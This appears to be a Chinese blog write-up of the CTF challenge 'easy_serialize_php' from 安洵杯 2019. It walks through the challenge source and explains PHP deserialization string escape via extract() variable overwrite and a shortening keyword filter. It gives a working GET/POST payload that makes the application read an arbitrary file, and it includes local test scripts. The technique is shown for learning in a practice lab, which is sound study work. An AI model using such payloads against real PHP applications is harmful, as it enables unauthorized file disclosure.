【安洵杯 2019】easy_serialize_php

最新推荐文章于 2025-12-09 14:46:51 发布
原创 最新推荐文章于 2025-12-09 14:46:51 发布 · 275 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#php #android #android studio #网络安全 #NSSCTF

还是先挂着参考文章

简单分析

<?php

$function = @$_GET['f'];

function filter($img){
    $filter_arr = array('php','flag','php5','php4','fl1g');
    $filter = '/'.implode('|',$filter_arr).'/i';
    return preg_replace($filter,'',$img);//将名单中的字符串替换为空【字符串减少造成逃逸】
}


if($_SESSION){
    unset($_SESSION);
}

$_SESSION["user"] = 'guest';
$_SESSION['function'] = $function;

extract($_POST);//变量覆盖,将_SESSION[user]、_SESSION[function]作为变量名,反序列化入口

if(!$function){
    echo '<a href="index.php?f=highlight_file">source_code</a>';
}

if(!$_GET['img_path']){//无论$_GET['img_path']存不存在,$_SESSION['img']的值都是我们不可控的
    $_SESSION['img'] = base64_encode('guest_img.png');
}else{
    $_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}

$serialize_info = filter(serialize($_SESSION));//过滤

if($function == 'highlight_file'){
    highlight_file('index.php');
}else if($function == 'phpinfo'){
    eval('phpinfo();'); //根据提示,在phpinfo中的auto_append_file上面找到d0g3_f1ag.php
}else if($function == 'show_image'){//$_GET['f'];的值为show_image才执行下面的反序列化
    $userinfo = unserialize($serialize_info);
    echo file_get_contents(base64_decode($userinfo['img']));
}  //$_SESSION['img']的值是我们要读取的文件名,但它的值我们不可控,所以要构造字符串逃逸,使$_SESSION['img']的值可控

构造逃逸

<?php
//本地测试
$function = @$_GET['f'];

function filter($img){
    $filter_arr = array('php','flag','php5','php4','fl1g');
    $filter = '/'.implode('|',$filter_arr).'/i';
    return preg_replace($filter,'',$img);
}

$_SESSION["user"] = '';
$_SESSION['function'] ='Y';
$_SESSION['img']="ZDBnM19mMWFnLnBocA==";
//ZDBnM19mMWFnLnBocA==是base64编码后的d0g3_f1ag.php
extract($_POST);

$serialize_info = filter(serialize($_SESSION));
echo $serialize_info;

//结果
a:3:{s:4:"user";s:0:"";s:8:"function";s:1:"Y";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}

其中";s:8:“function”;s:1:"Y是要被吞掉字符串,共24位,24/3=8,也就是需要8个php

";s:3:“img”;s:20:“ZDBnM19mMWFnLnBocA==”;}是要通过逃逸添加进去的字符串

payload:

GET:?f=show_image
POST:_SESSION[user]=phpphpphpphpphpphpphpphp&_SESSION[function]=Y";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:4:"test";s:4:"test";}

需要在后面添加一个属性,保障能正常反序列化 然后右键源码找到真的flag文件,将其base64编码后替换原本的ZDBnM19mMWFnLnBocA==即可(两者长度都是20位,所以可以直接替换)

本地验证:

<?php

$function = @$_GET['f'];

function filter($img){
    $filter_arr = array('php','flag','php5','php4','fl1g');
    $filter = '/'.implode('|',$filter_arr).'/i';
    return preg_replace($filter,'',$img);
}

$_SESSION["user"]='phpphpphpphpphpphpphpphp';
$_SESSION['function'] ='Y";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}';
$_SESSION['img']="XXX";

extract($_POST);

$serialize_info = (serialize($_SESSION));
echo $serialize_info;

过滤前:
a:3:{s:4:"user";s:24:"phpphpphpphpphpphpphpphp";s:8:"function";s:42:"Y";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";s:3:"img";s:3:"XXX";}

过滤后:
a:3:{s:4:"user";s:24:"";s:8:"function";s:42:"Y";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";s:3:"img";s:3:"XXX";}

过滤前的8个php是user的值,过滤后8个php被替换为空,但user的长度24没有改变,所以user会往右边“吞噬”24个字符,将其作为自身的值。

所以";s:8:“function”;s:1:“Y变成了user的值,而”;s:3:“img”;s:20:“ZDBnM19mMWFnLnBocA==”;}闭合前后,将原本的img取而代之,成功通过字符串逃逸控制$_SESSION[‘img’]的值

XiaoHei_Q
关注
[安洵 2019]easy_serialize_php 1
m0_62879498的博客
05-08 3950
[安洵 2019]easy_serialize_php 1 进入环境,我们首先查看 index.php 源码 代码审计: $function = @$_GET['f']; function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'.implode('|',$filter_arr).'/i'; return preg_replace($filter,''
[安洵 2019]easy_serialize_php(有思考过程)
v2ish1yan的博客
04-20 3308
[安洵 2019]easy_serialize_php 反序列化
安洵 2019 easy_serialize_php 1
hddi1的博客
12-22 956
代码审计 #配置文件 #自动包含 #变量覆盖漏洞 #过滤函数反序列化字符逃逸 #本地运行进来点击source_code就给了我们一段php代码。
[安洵 2019]easy_serialize_php
2301_79806187的博客
07-22 1074
五颗星:php反序列化字符逃逸,extract函数
[安洵 2019]easy_serialize_php1
alwtj的博客
06-16 2698
filter 这个function 可以看作一个过滤器,具体内容为首先定义了一个$filter_arr数组,数组的内容为:'php','flag','php5','php4','fl1g',又定义了一个$filter的字符串,格式是为了迎合下面的preg_replease()函数,意思就是如果匹配到$filter_arr数组中的内容则将其转换为空,且由于i的缘故,不区分大小写.s:20:"ZDBnM19mMWFnLnBocA==";s:48:" 就变成了 s:7:"";
BUUCTF [安洵 2019]easy_serialize_php
weixin_73399382的博客
07-25 1521
然而因为filter函数的过滤,将php和flag过滤掉,因为指定的键名长度为10,产生了字符串逃逸,我们在后面随便添加几个垃圾字符让它往后读取形成一个新的键名,形成一个键值对,如下所示是payload过滤加上字符串逃逸后形成的序列化数据。php反序列化的过程中必须严格按照序列化规则才能成功实现反序列化,如果出现这种情况s:10:"flag",键名长度为4,但规定长度为10,就会造成字符串逃逸向后读取,这里是我们解题的关键。s:3:"img";后面代码中先进行序列化操作,原本的序列化数据应该为。
BUU40 [安洵 2019]easy_serialize_php
2401_86190146的博客
02-21 611
那怎么办呢,有两条路,第一条路是前面POST提交一个img是flag的值【这里提交变量为_SESSION这样进去就变成了$_SESSION就能混进本来的超级全局变量里头去了,好好好这么玩是吧】,第二条路就是利用php的反序列化字符串逃逸减少的情况,将原本的$_SESSION['img']=base64-en("guest_img.png")吞掉(变成前一个键的值),然后后面顺理成章接着我们构造的新的$_SESSION['img']的值。学习到个新的写法,就是直接写$_SESSION['xxx']
BUUCTF [安洵 2019]easy_serialize_php 1
kw741951的博客
08-05 582
替换编码_SESSION[user]=flagflagflagflagflagphp&_SESSION[function]=";s:3:"img";s:3:"img";extract可以将数组中的变量导入当前变量表。
BUUCTF:[安洵 2019]easy_serialize_php
末初 · mochu7
03-03 1268
https://buuoj.cn/challenges#[%E5%AE%89%E6%B4%B5%E6%9D%AF%202019]easy_serialize_php 访问/index.php?f=highlight_file得到源码 <?php $function = @$_GET['f']; function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'
[安洵2019]easy_serialize_php
weixin_45808483的博客
12-09 3197
知识点 反序列化字符逃逸(替换后导致字符串变短) 题目链接 BUUCTF在线评测[%E5%AE%89%E6%B4%B5%E6%9D%AF%202019]easy_serialize_php 审计代码 启动环境 打开题目是一段代码: <?php ​ $function = @$_GET['f']; ​ function filter($img){ //fileter过滤函数,将falg,php等过滤为空 $filter_arr = array('php','flag','p...
BUUCTF [安洵 2019]easy_serialize_php 1 详细讲解
qq_56313338的博客
08-12 1088
题目来自buuctf,这是一题关于php序列化逃逸的题。
[CTF][安洵 2019]easy_serialize_php 1 -- 反序列化漏洞、反序列化字符逃逸
Gh0st_1n_The_Shell的博客
08-28 1916
[安洵 2019]easy_serialize_php 1 首先打开靶机,只有一个链接没有其他东西 目录爆破没有爆破出来东西,打开链接,发现给出了网站源码 <?php $function = @$_GET['f']; function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'.implode('|',$filter_arr).'/i'; retu
php和c++哪个更好学?C++难学吗?
2503_94025595的博客
12-05 695
PHP和C++入门选择指南 对于编程初学者,PHP和C++各有特点: PHP更适合零基础入门,语法灵活,学习曲线平缓,能快速实现动态网页效果 C++学习难度较大,需要理解底层原理,但适合系统级开发和高性能应用 核心差异:PHP变量类型灵活自动内存管理,C++强类型手动内存管理 建议根据目标选择:Web开发选PHP,游戏/系统开发选C++ 学习要点:PHP重实践项目,C++需循序渐进掌握基础语法 关键是根据个人兴趣和发展方向选择,保持持续学习最重要。
【昆工】毕业可投的国际期刊
最新发布
2503_94022055的博客
12-09 231
推荐码:ZMZ-01。推荐码:ZMZ-01。推荐码:ZMZ-01。推荐码:ZMZ-01。推荐码:ZMZ-01。
Bugku HackINI 2022 Whois 详解
m0_56970656的博客
12-09 307
基础的Linux RCE 绕过。
k8s部署wordpress
2502_92656182的博客
12-06 669
在 K8s( Kubernetes)中部署 WordPress,通常需要结合Deployment(部署 WordPress 应用)+ Service(暴露访问)+ PersistentVolumeClaim(存储数据)+ 数据库(比如 MySQL) 来实现。以下是简化的核心步骤:先部署 MySQL(也可以用已有数据库),需要配置存储和账号: 2. 部署 WordPress 配置 WordPress 的 Deployment 和 Service,关联 MySQL: 3. 配置存储(PVC) 需要提
102【php开发准备】
vbnetcx的博客
12-08 389
本文阐述了前后端开发的基本概念与技术选择。前端负责用户界面展示(HTML/CSS/JS),后端处理逻辑运算(PHP/Java/Python等),二者通过HTTP协议通信。特别指出:1)PHP的优势在于高效接收HTTP数据及与HTML的兼容性;2)开发选择应考虑实际需求,如仅需HTTP通信可使用易语言的SX盾框架;3)Web开发需先掌握HTML+CSS+JS前端基础。强调实战开发应以需求为导向,而非过分追求理论规范。建议零基础者先学习易语言系列教程,再进入Web开发学习。
如何检查CMS建站系统的数据库链接问题?
12-06 641
CMS 建站系统(如 WordPress、DedeCMS、亿坊cms等)的数据库链接是其运行的核心。一旦链接失败,会导致网站无法打开、后台无法登录、数据加载异常等问题。本文结合实战经验,整理了一套循序渐进的排查方法,帮助开发者快速定位并解决数据库链接故障。
渗透测试——靶机Sar1渗透横向详细过程
m0_73812072的博客
12-08 834
本次实践中,将首次借助Linux系统的计划任务特性实现提权,我们会利用权限的继承关系,尝试篡改具有root权限的计划任务,进而完成提权目标。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值